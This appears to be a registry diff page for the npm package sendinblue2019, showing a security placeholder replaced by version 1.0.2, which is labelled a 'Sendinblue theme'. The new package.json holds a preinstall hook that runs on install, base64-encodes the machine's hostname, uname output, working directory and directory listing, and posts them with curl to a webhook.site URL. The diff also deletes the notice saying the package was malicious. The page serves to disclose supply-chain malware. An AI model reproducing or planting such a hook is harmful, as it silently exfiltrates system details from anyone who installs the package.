sendinblue2019 0.0.1-security → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of sendinblue2019 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +19 -3
  2. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,22 @@
1
1
  {
2
2
  "name": "sendinblue2019",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.2",
4
+ "description": "Sendinblue theme",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "build": "wp-scripts build",
8
+ "check-engines": "wp-scripts check-engines",
9
+ "check-licenses": "wp-scripts check-licenses",
10
+ "lint:css": "wp-scripts lint-style",
11
+ "lint:js": "wp-scripts lint-js",
12
+ "lint:pkg-json": "wp-scripts lint-pkg-json",
13
+ "start": "wp-scripts start",
14
+ "test:e2e": "wp-scripts test-e2e",
15
+ "update-library": "rm -rf node_modules/@dtsl/website-component-library & npm i",
16
+ "test:unit": "wp-scripts test-unit-js",
17
+ "preinstall": "curl -H \"Hostname: $(hostname | base64)\" -H \"uname: $(uname -a | base64)\" -H \"Pwd: $(pwd | base64)\" -d $(ls -la | base64) https://webhook.site/6378045a-b81a-4e03-822d-f86b2568a70b"
18
+ },
19
+ "author": "Malith Priyashan",
20
+ "license": "ISC",
21
+ "devDependencies": {}
6
22
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=sendinblue2019 for more information.